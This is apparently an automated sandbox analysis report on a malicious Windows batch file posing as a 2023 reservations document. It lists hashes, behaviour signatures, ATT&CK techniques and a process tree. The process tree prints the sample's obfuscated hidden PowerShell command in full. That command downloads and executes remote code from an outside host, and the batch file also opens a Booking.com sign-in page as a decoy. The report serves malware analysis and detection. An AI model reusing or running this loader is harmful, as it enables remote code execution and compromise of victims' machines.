Analysis

  • max time kernel
    45s
  • max time network
    104s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    26-12-2022 12:26

General

  • Target

    Bloque de Reservas 2023.bat

  • Size

    21KB

  • MD5

    2a80fa747f0ea4e2c77d551a23d65285

  • SHA1

    f657495753dd91057279f8171eb031a26e57a5b0

  • SHA256

    3b42d41243205d02ba8d6ed32387207e340a29e7d4fc3b5c6451126b7a9c4f79

  • SHA512

    9f461b4d9afef6024dc456b04d882c8634932114e2ccb6611a4b99d21409da9a43d66adf4f19c0f294a1524e5c12f73cf5d51a45fc768311561815ebe46ebe67

  • SSDEEP

    384:Q9OXED0jw4MhT9OXED0jw4Mhc9OXED0jw4MhNG99OXED0jw4MhN6P:Q6+466+4j6+4sG6+4OY

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 50 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Bloque de Reservas 2023.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1960
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" https://account.booking.com/sign-in?op_token=EgVvYXV0aCJHChQ2Wjcyb0hPZDM2Tm43emszcGlyaBIJYXV0aG9yaXplGhpodHRwczovL2FkbWluLmJvb2tpbmcuY29tLyoCe31CBGNvZGUqEjCk3OzCvbMlOgBCAFjunbCQBg
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:864
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:864 CREDAT:275457 /prefetch:2
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:1620
    • C:\Windows\system32\cmd.exe
      CMD /C POWERSHELL -NOP -WIND HIDDEN -EXEC BYPASS -NONI $_xh_vs_m__yhm____j_w______e_o_rkal___am__n_jj_hezz___sq_loh__c_wdmh_bku__wrnfd__gayoqwwh__c____c__gvm_dpff___dw_f_c___g_pa___nhrz__x____wj_k_egqr__bc_ygbz_mx_iqxhsl_y______z_jkt____gpqq__x_o__b_n_luk_kk_a_egh_tsh_u_r____c_k_yl_h___yebd___z___hnvvkgnvyj_zqxa____yaxs__u_c_cc_z_fvgd____tr____c='IEX(NEW-OBJECT NET.W';$mn_c__j_bs_okzwhsze_e_y__fpeb____z__j___v__k____w_f_gm_____i_f_f__dk__x___w_x___xfh_qt_y_yy__e_qg_______mrq________txen_a____c_____yyne_lsd__fih__c_te_clog___f_f__lwncf_ijf_oxu_d__z_p____k__ri_s__o__yvw_k_n__ql__x___rk__arx_p_____gysg_______q__s_k_i__d_j_e__v_w__nf__re__ncz__yb_____n_dzki__='EBCLIENT).DOWNLO';SlEEp 1;[BYTE[]];SlEEp 1;$a_y_lnx_b__k__c___gk_s___hjw_czj_c_yr____w____c_l___a___j_cefb__f_______q_e__ves__k__cj_mc_x__g____eij_hp___t_im_j_______f___of_nzifzzlvu__dv__ltc__ax____qdcssboo_______d__py_k___k__q_kl_gj_____n_kp___qxwk__tmh_he_t_xbk___h_k___lzx___x_l_g_ds_c_______lgj_h_hmy_jjmjedhjd__u__x_f__n__dq__u___='ALLAH(''http://skynetx.com.br/cr.png'')'.RePLACe('ALLAH','ADSTRING');SlEEp 1;IEX($_xh_vs_m__yhm____j_w______e_o_rkal___am__n_jj_hezz___sq_loh__c_wdmh_bku__wrnfd__gayoqwwh__c____c__gvm_dpff___dw_f_c___g_pa___nhrz__x____wj_k_egqr__bc_ygbz_mx_iqxhsl_y______z_jkt____gpqq__x_o__b_n_luk_kk_a_egh_tsh_u_r____c_k_yl_h___yebd___z___hnvvkgnvyj_zqxa____yaxs__u_c_cc_z_fvgd____tr____c+$mn_c__j_bs_okzwhsze_e_y__fpeb____z__j___v__k____w_f_gm_____i_f_f__dk__x___w_x___xfh_qt_y_yy__e_qg_______mrq________txen_a____c_____yyne_lsd__fih__c_te_clog___f_f__lwncf_ijf_oxu_d__z_p____k__ri_s__o__yvw_k_n__ql__x___rk__arx_p_____gysg_______q__s_k_i__d_j_e__v_w__nf__re__ncz__yb_____n_dzki__+$a_y_lnx_b__k__c___gk_s___hjw_czj_c_yr____w____c_l___a___j_cefb__f_______q_e__ves__k__cj_mc_x__g____eij_hp___t_im_j_______f___of_nzifzzlvu__dv__ltc__ax____qdcssboo_______d__py_k___k__q_kl_gj_____n_kp___qxwk__tmh_he_t_xbk___h_k___lzx___x_l_g_ds_c_______lgj_h_hmy_jjmjedhjd__u__x_f__n__dq__u___)
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1720
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        POWERSHELL -NOP -WIND HIDDEN -EXEC BYPASS -NONI $_xh_vs_m__yhm____j_w______e_o_rkal___am__n_jj_hezz___sq_loh__c_wdmh_bku__wrnfd__gayoqwwh__c____c__gvm_dpff___dw_f_c___g_pa___nhrz__x____wj_k_egqr__bc_ygbz_mx_iqxhsl_y______z_jkt____gpqq__x_o__b_n_luk_kk_a_egh_tsh_u_r____c_k_yl_h___yebd___z___hnvvkgnvyj_zqxa____yaxs__u_c_cc_z_fvgd____tr____c='IEX(NEW-OBJECT NET.W';$mn_c__j_bs_okzwhsze_e_y__fpeb____z__j___v__k____w_f_gm_____i_f_f__dk__x___w_x___xfh_qt_y_yy__e_qg_______mrq________txen_a____c_____yyne_lsd__fih__c_te_clog___f_f__lwncf_ijf_oxu_d__z_p____k__ri_s__o__yvw_k_n__ql__x___rk__arx_p_____gysg_______q__s_k_i__d_j_e__v_w__nf__re__ncz__yb_____n_dzki__='EBCLIENT).DOWNLO';SlEEp 1;[BYTE[]];SlEEp 1;$a_y_lnx_b__k__c___gk_s___hjw_czj_c_yr____w____c_l___a___j_cefb__f_______q_e__ves__k__cj_mc_x__g____eij_hp___t_im_j_______f___of_nzifzzlvu__dv__ltc__ax____qdcssboo_______d__py_k___k__q_kl_gj_____n_kp___qxwk__tmh_he_t_xbk___h_k___lzx___x_l_g_ds_c_______lgj_h_hmy_jjmjedhjd__u__x_f__n__dq__u___='ALLAH(''http://skynetx.com.br/cr.png'')'.RePLACe('ALLAH','ADSTRING');SlEEp 1;IEX($_xh_vs_m__yhm____j_w______e_o_rkal___am__n_jj_hezz___sq_loh__c_wdmh_bku__wrnfd__gayoqwwh__c____c__gvm_dpff___dw_f_c___g_pa___nhrz__x____wj_k_egqr__bc_ygbz_mx_iqxhsl_y______z_jkt____gpqq__x_o__b_n_luk_kk_a_egh_tsh_u_r____c_k_yl_h___yebd___z___hnvvkgnvyj_zqxa____yaxs__u_c_cc_z_fvgd____tr____c+$mn_c__j_bs_okzwhsze_e_y__fpeb____z__j___v__k____w_f_gm_____i_f_f__dk__x___w_x___xfh_qt_y_yy__e_qg_______mrq________txen_a____c_____yyne_lsd__fih__c_te_clog___f_f__lwncf_ijf_oxu_d__z_p____k__ri_s__o__yvw_k_n__ql__x___rk__arx_p_____gysg_______q__s_k_i__d_j_e__v_w__nf__re__ncz__yb_____n_dzki__+$a_y_lnx_b__k__c___gk_s___hjw_czj_c_yr____w____c_l___a___j_cefb__f_______q_e__ves__k__cj_mc_x__g____eij_hp___t_im_j_______f___of_nzifzzlvu__dv__ltc__ax____qdcssboo_______d__py_k___k__q_kl_gj_____n_kp___qxwk__tmh_he_t_xbk___h_k___lzx___x_l_g_ds_c_______lgj_h_hmy_jjmjedhjd__u__x_f__n__dq__u___)
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1716

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

1
T1112

Discovery

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\lwrmjt1\imagestore.dat
    Filesize

    6KB

    MD5

    3590b3795e3cb11a161a8df66f07e164

    SHA1

    bc07deec240975845324ea564e532840aecbc2f3

    SHA256

    cac0aec35dc77b5c275e026335625b0cb2dd20909eab791445f5e7740645d6d7

    SHA512

    1134a376d653042cb57b3c8d2a17b419d8dc451e26d540581c654faeebda970e5ea87f50f187d7a281024fd4587d49828cf25eabdb40869f9341f1158a20be84

  • memory/1716-79-0x0000000000000000-mapping.dmp
  • memory/1716-81-0x000007FEF4990000-0x000007FEF53B3000-memory.dmp
    Filesize

    10.1MB

  • memory/1716-83-0x0000000002694000-0x0000000002697000-memory.dmp
    Filesize

    12KB

  • memory/1716-82-0x000007FEF3E30000-0x000007FEF498D000-memory.dmp
    Filesize

    11.4MB

  • memory/1716-84-0x000000000269B000-0x00000000026BA000-memory.dmp
    Filesize

    124KB

  • memory/1716-85-0x0000000002694000-0x0000000002697000-memory.dmp
    Filesize

    12KB

  • memory/1716-86-0x000000000269B000-0x00000000026BA000-memory.dmp
    Filesize

    124KB

  • memory/1720-77-0x0000000000000000-mapping.dmp
  • memory/1960-54-0x000007FEFC621000-0x000007FEFC623000-memory.dmp
    Filesize

    8KB